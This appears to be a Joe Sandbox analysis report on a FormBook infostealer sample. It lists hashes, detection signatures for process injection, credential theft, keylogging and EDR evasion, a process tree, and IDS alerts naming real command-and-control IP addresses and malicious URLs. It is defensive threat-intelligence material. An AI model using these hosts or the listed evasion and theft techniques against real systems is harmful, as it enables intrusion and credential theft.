Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
KSts9xW7qy.exe

Overview

General Information

Sample name:KSts9xW7qy.exe
renamed because original name is a hash value
Original sample name:faaaf55864fc01e6ec6494ad014c4408492dd38fbac211bfa1bb648f98577eea.exe
Analysis ID:1586004
MD5:0cff79b58dc5c20effd62a99e489556c
SHA1:fc68ff8f2d72961ccedda7fe76c95f1270e21d10
SHA256:faaaf55864fc01e6ec6494ad014c4408492dd38fbac211bfa1bb648f98577eea
Tags:exeuser-adrian__luca
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • KSts9xW7qy.exe (PID: 6916 cmdline: "C:\Users\user\Desktop\KSts9xW7qy.exe" MD5: 0CFF79B58DC5C20EFFD62A99E489556C)
    • svchost.exe (PID: 6964 cmdline: "C:\Users\user\Desktop\KSts9xW7qy.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • pTPcvfjkbwUWkD.exe (PID: 2412 cmdline: "C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • winrs.exe (PID: 7164 cmdline: "C:\Windows\SysWOW64\winrs.exe" MD5: E6C1CE56E6729A0B077C0F2384726B30)
          • pTPcvfjkbwUWkD.exe (PID: 3752 cmdline: "C:\Program Files (x86)\ewqukjTmHvqKCzGyHOZrtrsdmaYGpYrydXzTPBgmwWsfwQgeDwQWCtuODAtwteHTtOVSvkqLjZQffiC\pTPcvfjkbwUWkD.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 1196 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.3520669153.0000000003140000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000001.00000002.1774901858.0000000003390000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000001.00000002.1775305833.0000000004E50000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000003.00000002.3519819683.00000000029B0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000003.00000002.3520621345.00000000030F0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 2 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            1.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              1.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Uncommon Svchost Parent Process
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\KSts9xW7qy.exe", CommandLine: "C:\Users\user\Desktop\KSts9xW7qy.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\KSts9xW7qy.exe", ParentImage: C:\Users\user\Desktop\KSts9xW7qy.exe, ParentProcessId: 6916, ParentProcessName: KSts9xW7qy.exe, ProcessCommandLine: "C:\Users\user\Desktop\KSts9xW7qy.exe", ProcessId: 6964, ProcessName: svchost.exe
                Sigma detected: Windows Processes Suspicious Parent Directory
                Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\KSts9xW7qy.exe", CommandLine: "C:\Users\user\Desktop\KSts9xW7qy.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\KSts9xW7qy.exe", ParentImage: C:\Users\user\Desktop\KSts9xW7qy.exe, ParentProcessId: 6916, ParentProcessName: KSts9xW7qy.exe, ProcessCommandLine: "C:\Users\user\Desktop\KSts9xW7qy.exe", ProcessId: 6964, ProcessName: svchost.exe

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-08T16:12:50.222180+010020507451Malware Command and Control Activity Detected192.168.2.449736188.114.96.380TCP
                2025-01-08T16:13:13.987528+010020507451Malware Command and Control Activity Detected192.168.2.44974023.167.152.4180TCP
                2025-01-08T16:13:27.395483+010020507451Malware Command and Control Activity Detected192.168.2.44976166.29.132.19480TCP
                2025-01-08T16:13:42.553844+010020507451Malware Command and Control Activity Detected192.168.2.449854202.92.5.2380TCP
                2025-01-08T16:13:55.916392+010020507451Malware Command and Control Activity Detected192.168.2.449946194.195.220.4180TCP
                2025-01-08T16:14:10.348384+010020507451Malware Command and Control Activity Detected192.168.2.450022103.230.159.8680TCP
                2025-01-08T16:14:24.016119+010020507451Malware Command and Control Activity Detected192.168.2.450026188.114.97.380TCP
                2025-01-08T16:14:38.111978+010020507451Malware Command and Control Activity Detected192.168.2.450030118.107.250.10380TCP
                2025-01-08T16:14:51.423596+010020507451Malware Command and Control Activity Detected192.168.2.450034209.74.77.10980TCP
                2025-01-08T16:15:04.892532+010020507451Malware Command and Control Activity Detected192.168.2.450038188.114.96.380TCP
                2025-01-08T16:15:18.236252+010020507451Malware Command and Control Activity Detected192.168.2.450042194.245.148.18980TCP
                2025-01-08T16:15:31.561801+010020507451Malware Command and Control Activity Detected192.168.2.450046199.59.243.22880TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-08T16:12:50.222180+010028554651A Network Trojan was detected192.168.2.449736188.114.96.380TCP
                2025-01-08T16:13:13.987528+010028554651A Network Trojan was detected192.168.2.44974023.167.152.4180TCP
                2025-01-08T16:13:27.395483+010028554651A Network Trojan was detected192.168.2.44976166.29.132.19480TCP
                2025-01-08T16:13:42.553844+010028554651A Network Trojan was detected192.168.2.449854202.92.5.2380TCP
                2025-01-08T16:13:55.916392+010028554651A Network Trojan was detected192.168.2.449946194.195.220.4180TCP
                2025-01-08T16:14:10.348384+010028554651A Network Trojan was detected192.168.2.450022103.230.159.8680TCP
                2025-01-08T16:14:24.016119+010028554651A Network Trojan was detected192.168.2.450026188.114.97.380TCP
                2025-01-08T16:14:38.111978+010028554651A Network Trojan was detected192.168.2.450030118.107.250.10380TCP
                2025-01-08T16:14:51.423596+010028554651A Network Trojan was detected192.168.2.450034209.74.77.10980TCP
                2025-01-08T16:15:04.892532+010028554651A Network Trojan was detected192.168.2.450038188.114.96.380TCP
                2025-01-08T16:15:18.236252+010028554651A Network Trojan was detected192.168.2.450042194.245.148.18980TCP
                2025-01-08T16:15:31.561801+010028554651A Network Trojan was detected192.168.2.450046199.59.243.22880TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-08T16:13:06.356572+010028554641A Network Trojan was detected192.168.2.44973723.167.152.4180TCP
                2025-01-08T16:13:08.901022+010028554641A Network Trojan was detected192.168.2.44973823.167.152.4180TCP
                2025-01-08T16:13:11.441722+010028554641A Network Trojan was detected192.168.2.44973923.167.152.4180TCP
                2025-01-08T16:13:19.609541+010028554641A Network Trojan was detected192.168.2.44974166.29.132.19480TCP
                2025-01-08T16:13:22.180861+010028554641A Network Trojan was detected192.168.2.44974266.29.132.19480TCP
                2025-01-08T16:13:24.849361+010028554641A Network Trojan was detected192.168.2.44974566.29.132.19480TCP
                2025-01-08T16:13:34.870994+010028554641A Network Trojan was detected192.168.2.449803202.92.5.2380TCP
                2025-01-08T16:13:37.453725+010028554641A Network Trojan was detected192.168.2.449820202.92.5.2380TCP
                2025-01-08T16:13:40.001405+010028554641A Network Trojan was detected192.168.2.449838202.92.5.2380TCP
                2025-01-08T16:13:48.248148+010028554641A Network Trojan was detected192.168.2.449895194.195.220.4180TCP
                2025-01-08T16:13:50.823965+010028554641A Network Trojan was detected192.168.2.449911194.195.220.4180TCP
                2025-01-08T16:13:53.346740+010028554641A Network Trojan was detected192.168.2.449927194.195.220.4180TCP
                2025-01-08T16:14:02.727959+010028554641A Network Trojan was detected192.168.2.449981103.230.159.8680TCP
                2025-01-08T16:14:05.236870+010028554641A Network Trojan was detected192.168.2.449999103.230.159.8680TCP
                2025-01-08T16:14:08.023489+010028554641A Network Trojan was detected192.168.2.450016103.230.159.8680TCP
                2025-01-08T16:14:16.027012+010028554641A Network Trojan was detected192.168.2.450023188.114.97.380TCP
                2025-01-08T16:14:18.611002+010028554641A Network Trojan was detected192.168.2.450024188.114.97.380TCP
                2025-01-08T16:14:21.387697+010028554641A Network Trojan was detected192.168.2.450025188.114.97.380TCP
                2025-01-08T16:14:30.383853+010028554641A Network Trojan was detected192.168.2.450027118.107.250.10380TCP
                2025-01-08T16:14:32.991448+010028554641A Network Trojan was detected192.168.2.450028118.107.250.10380TCP
                2025-01-08T16:14:35.548903+010028554641A Network Trojan was detected192.168.2.450029118.107.250.10380TCP
                2025-01-08T16:14:43.777584+010028554641A Network Trojan was detected192.168.2.450031209.74.77.10980TCP
                2025-01-08T16:14:46.301778+010028554641A Network Trojan was detected192.168.2.450032209.74.77.10980TCP
                2025-01-08T16:14:48.865463+010028554641A Network Trojan was detected192.168.2.450033209.74.77.10980TCP
                2025-01-08T16:14:57.187963+010028554641A Network Trojan was detected192.168.2.450035188.114.96.380TCP
                2025-01-08T16:14:59.749418+010028554641A Network Trojan was detected192.168.2.450036188.114.96.380TCP
                2025-01-08T16:15:02.354360+010028554641A Network Trojan was detected192.168.2.450037188.114.96.380TCP
                2025-01-08T16:15:10.618642+010028554641A Network Trojan was detected192.168.2.450039194.245.148.18980TCP
                2025-01-08T16:15:13.142928+010028554641A Network Trojan was detected192.168.2.450040194.245.148.18980TCP
                2025-01-08T16:15:15.775249+010028554641A Network Trojan was detected192.168.2.450041194.245.148.18980TCP
                2025-01-08T16:15:23.845041+010028554641A Network Trojan was detected192.168.2.450043199.59.243.22880TCP
                2025-01-08T16:15:26.403999+010028554641A Network Trojan was detected192.168.2.450044199.59.243.22880TCP
                2025-01-08T16:15:28.949228+010028554641A Network Trojan was detected192.168.2.450045199.59.243.22880TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus detection for URL or domain
                Source: http://www.beylikduzu616161.xyz/2nga/Avira URL Cloud: Label: malware
                Source: http://www.orbitoasis.online/k6yn/Avira URL Cloud: Label: malware
                Multi AV Scanner detection for submitted file
                Source: KSts9xW7qy.exeReversingLabs: Detection: 71%
                Yara detected FormBook
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000003.00000002.3520669153.0000000003140000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1774901858.0000000003390000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1775305833.0000000004E50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3519819683.00000000029B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3520621345.00000000030F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.1774629160.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.3520719360.0000000004150000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: KSts9xW7qy.exeJoe Sandbox ML: detected
                Source: KSts9xW7qy.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: winrs.pdbGCTL source: svchost.exe, 00000001.00000003.1743692170.0000000003024000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1743676400.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1743605117.000000000301B000.00000004.00000020.00020000.00000000.sdmp, pTPcvfjkbwUWkD.exe, 00000002.00000002.3520262772.0000000001088000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: pTPcvfjkbwUWkD.exe, 00000002.00000002.3519820185.000000000060E000.00000002.00000001.01000000.00000004.sdmp, pTPcvfjkbwUWkD.exe, 00000005.00000002.3519916221.000000000060E000.00000002.00000001.01000000.00000004.sdmp
                Source: Binary string: wntdll.pdbUGP source: KSts9xW7qy.exe, 00000000.00000003.1671503476.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, KSts9xW7qy.exe, 00000000.00000003.1671284803.0000000004030000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1774970089.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1774970089.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1673895797.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1675431997.0000000003400000.00000004.00000020.00020000.00000000.sdmp, winrs.exe, 00000003.00000003.1782575631.00000000031B3000.00000004.00000020.00020000.00000000.sdmp, winrs.exe, 00000003.00000002.3520870455.00000000034FE000.00000040.00001000.00020000.00000000.sdmp, winrs.exe, 00000003.00000002.3520870455.0000000003360000.00000040.00001000.00020000.00000000.sdmp, winrs.exe, 00000003.00000003.1774609941.0000000002FC8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: KSts9xW7qy.exe, 00000000.00000003.1671503476.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, KSts9xW7qy.exe, 00000000.00000003.1671284803.0000000004030000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.1774970089.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1774970089.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1673895797.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1675431997.0000000003400000.00000004.00000020.00020000.00000000.sdmp, winrs.exe, winrs.exe, 00000003.00000003.1782575631.00000000031B3000.00000004.00000020.00020000.00000000.sdmp, winrs.exe, 00000003.00000002.3520870455.00000000034FE000.00000040.00001000.00020000.00000000.sdmp, winrs.exe, 00000003.00000002.3520870455.0000000003360000.00000040.00001000.00020000.00000000.sdmp, winrs.exe, 00000003.00000003.1774609941.0000000002FC8000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: winrs.pdb source: svchost.exe, 00000001.00000003.1743692170.0000000003024000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1743676400.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1743605117.000000000301B000.00000004.00000020.00020000.00000000.sdmp, pTPcvfjkbwUWkD.exe, 00000002.00000002.3520262772.0000000001088000.00000004.00000020.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00EB6CA9 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00EB6CA9
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00EB60DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_00EB60DD
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00EB63F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_00EB63F9
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00EBEB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00EBEB60
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00EBF5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00EBF5FA
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00EBF56F FindFirstFileW,FindClose,0_2_00EBF56F
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00EC1B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00EC1B2F
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00EC1C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00EC1C8A
                Source: C:\Users\user\Desktop\KSts9xW7qy.exeCode function: 0_2_00EC1F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00EC1F94
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 3_2_029CC3A0 FindFirstFileW,FindNextFileW,FindClose,3_2_029CC3A0
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 4x nop then xor eax, eax3_2_029B9F40
                Source: C:\Windows\SysWOW64\winrs.exeCode function: 4x nop then mov ebx, 00000004h3_2_032604CE

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49736 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49736 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49742 -> 66.29.132.194:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49737 -> 23.167.152.41:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49738 -> 23.167.152.41:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49803 -> 202.92.5.23:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49740 -> 23.167.152.41:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49740 -> 23.167.152.41:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49745 -> 66.29.132.194:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49761 -> 66.29.132.194:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49761 -> 66.29.132.194:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49820 -> 202.92.5.23:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49838 -> 202.92.5.23:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49854 -> 202.92.5.23:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49854 -> 202.92.5.23:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49741 -> 66.29.132.194:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49895 -> 194.195.220.41:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49911 -> 194.195.220.41:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49927 -> 194.195.220.41:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49981 -> 103.230.159.86:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49999 -> 103.230.159.86:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50016 -> 103.230.159.86:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50030 -> 118.107.250.103:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50031 -> 209.74.77.109:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50038 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50038 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50032 -> 209.74.77.109:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50028 -> 118.107.250.103:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50039 -> 194.245.148.189:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50029 -> 118.107.250.103:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50036 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50043 -> 199.59.243.228:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50045 -> 199.59.243.228:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50044 -> 199.59.243.228:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50025 -> 188.114.97.3:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50030 -> 118.107.250.103:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50026 -> 188.114.97.3:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50026 -> 188.114.97.3:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50041 -> 194.245.148.189:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50027 -> 118.107.250.103:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49946 -> 194.195.220.41:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49946 -> 194.195.220.41:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50040 -> 194.245.148.189:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50024 -> 188.114.97.3:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50033 -> 209.74.77.109:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50023 -> 188.114.97.3:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49739 -> 23.167.152.41:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50035 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50034 -> 209.74.77.109:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50034 -> 209.74.77.109:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50022 -> 103.230.159.86:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50022 -> 103.230.159.86:80
